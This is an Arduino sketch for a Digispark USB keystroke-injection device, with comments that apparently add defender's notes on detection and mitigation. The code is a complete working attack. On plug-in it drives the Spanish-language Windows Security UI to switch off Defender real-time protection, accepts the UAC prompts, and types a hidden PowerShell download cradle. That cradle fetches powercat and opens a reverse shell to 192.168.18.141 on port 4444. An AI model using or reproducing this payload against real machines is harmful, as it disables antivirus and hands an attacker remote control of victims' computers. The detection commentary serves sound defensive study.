#include "DigiKeyboard.h"
// USB HID keyboard/keypad usage IDs (HID Usage Tables, usage page 0x07) for the
// three keys this sketch needs beyond what it takes from DigiKeyboard.h:
// 0x29 (41) = Escape, 0x2B (43) = Tab, 0x2C (44) = Spacebar.
// Presumably defined here because the library version in use did not provide
// them; if the header already defines them with the same values this is a
// harmless redefinition, otherwise the compiler will warn — confirm against the
// installed DigiKeyboard.h.
#define KEY_ESC 41
#define KEY_TAB 43
#define KEY_SPACE 44
// Arduino entry point, run once at power-up: configures pin 1 as an output and
// drives it low. loop() later blinks this pin as a "payload finished" indicator,
// so it is presumably the on-board LED of the Digispark board — verify against
// the board model used.
void setup() {
pinMode(1, OUTPUT);
digitalWrite(1, LOW);
}
// Arduino main loop. Because it ends in an infinite blink loop, it effectively
// executes once per power-up: the complete keystroke-injection sequence fires
// as soon as the device is plugged in, with no user interaction beyond inserting
// it, and is never re-typed.
//
// Defender's note: the device enumerates as an ordinary USB HID keyboard, so the
// host sees typed input rather than a storage device — file-based AV has nothing
// to scan. The useful signals are the sudden enumeration of a new keyboard
// followed within seconds by the Windows Security and PowerShell activity that
// disarm_defender() and create_reverse_shell() drive. USB device-control policies
// that restrict newly attached HID devices, and locking unattended sessions,
// remove the unlocked interactive session this code depends on.
//
// disarm_defender() and create_reverse_shell() are defined further down; the
// Arduino build generates prototypes, so no forward declarations are needed
// here (plain C++ would require them).
void loop() {
// Null keystroke first — conventional with DigiKeyboard to give the host's HID
// driver time to settle before real keys are sent (library behaviour; not
// visible in this file).
DigiKeyboard.sendKeyStroke(0);
disarm_defender();
create_reverse_shell();
// Never returns: blink pin 1 forever so loop() does not re-run the injection.
while (true){
digitalWrite(1, HIGH);
delay(300);
digitalWrite(1, LOW);
delay(300);
}
}
// Blind keystroke sequence that navigates the Windows Security app to turn off
// Defender real-time protection. It has no feedback channel: it relies on the
// Spanish ("seguridad de windows") UI, the exact focus/tab order of the settings
// page and the fixed delays below, so any deviation (different UI language,
// slower machine, an unexpected dialog holding focus) leaves it typing into
// whatever window is active.
//
// Defender's note: turning off real-time protection through the UI is recorded
// in the Microsoft-Windows-Windows Defender/Operational log (event 5001,
// "Real-time protection is disabled") — a high-value alert, especially when it
// follows a new HID keyboard enumeration. The ARROW_LEFT + ENTER pair after the
// SPACE toggle looks like acceptance of the resulting UAC consent dialog (whose
// default button is "No"); if the logged-in user is not a local administrator the
// prompt asks for credentials instead and this step fails — confirm on a test
// machine.
//
// DigiKeyboard.delay() rather than delay() is used between keystrokes; per the
// library's documentation it keeps servicing USB while waiting.
void disarm_defender() {
// Ctrl+Esc opens the Start menu / Windows search.
DigiKeyboard.sendKeyStroke(KEY_ESC, MOD_CONTROL_LEFT);
DigiKeyboard.delay(1700);
// Search for the Windows Security app (the string is the Spanish app name;
// the author notes it must match the target's UI language).
DigiKeyboard.print(F("seguridad de windows"));
DigiKeyboard.delay(1700);
// First Enter launches the app, second Enter presumably opens the first
// section (virus & threat protection) — inferred from the author's comments.
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// Four Tabs move focus to the settings link; Enter opens it. The count is
// hard-coded to one specific Windows build/layout.
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// Space toggles the focused real-time protection switch off.
DigiKeyboard.sendKeyStroke(KEY_SPACE);
DigiKeyboard.delay(1500);
// Left arrow + Enter: appears to select "Yes" on the elevation prompt the
// toggle raises (default is "No") — hedged, see note above.
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// Alt+F4 closes the Windows Security window so the user is less likely to
// notice it.
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
}
// Opens an elevated PowerShell via the Run dialog and types a one-line download
// cradle: a hidden PowerShell process fetches powercat.ps1 from GitHub with
// System.Net.WebClient.DownloadString, executes it with IEX, and powercat then
// connects back to the hard-coded address 192.168.18.141 on TCP port 4444 with
// "-e powershell", i.e. a reverse shell to that host.
//
// Defender's note — the observable footprint of this function, in order:
//  * a UAC elevation of powershell.exe launched from the Run dialog (Ctrl+Shift+
//    Enter) seconds after a new HID keyboard appears;
//  * a child powershell.exe whose command line contains "-WindowStyle hidden",
//    "IEX(" and "DownloadString(" — classic download-cradle indicators for
//    process-creation telemetry (Sysmon 1 / Security 4688 with command-line
//    auditing), and PowerShell Script Block Logging (4104) records the fetched
//    script body;
//  * an HTTPS request to raw.githubusercontent.com immediately followed by an
//    outbound TCP connection to 192.168.18.141:4444.
// Egress filtering, blocking unsigned/unknown script execution (AppLocker/WDAC,
// Constrained Language Mode) and not running day-to-day as a local administrator
// each break a different link in this chain.
void create_reverse_shell (){
// Win+R opens the Run dialog; type "powershell" and use Ctrl+Shift+Enter,
// the Run dialog's run-as-administrator shortcut.
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.print(F("powershell"));
DigiKeyboard.delay(1700);
DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT|MOD_SHIFT_LEFT);
DigiKeyboard.delay(1500);
// Left arrow + Enter: appears to choose "Yes" on the UAC consent prompt
// (default button is "No"); with a standard-user account the prompt asks for
// credentials instead and this fails — confirm.
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// Author's note: change the IP or, if you are sure the target has an internet
// connection, put powercat's release file here; that way you won't need the
// HTTP server.
// The typed command starts a second, hidden PowerShell window so nothing stays
// visible to the user once the outer console is gone, while the remote host
// receives the shell. Note this is print(), not print(F()), so the ~230-byte
// literal occupies SRAM on the ATtiny85 as well as flash.
DigiKeyboard.print("PowerShell.exe -WindowStyle hidden {powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.18.141 -p 4444 -e powershell\"}");
DigiKeyboard.delay(1700);
// Enter executes the typed command line.
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}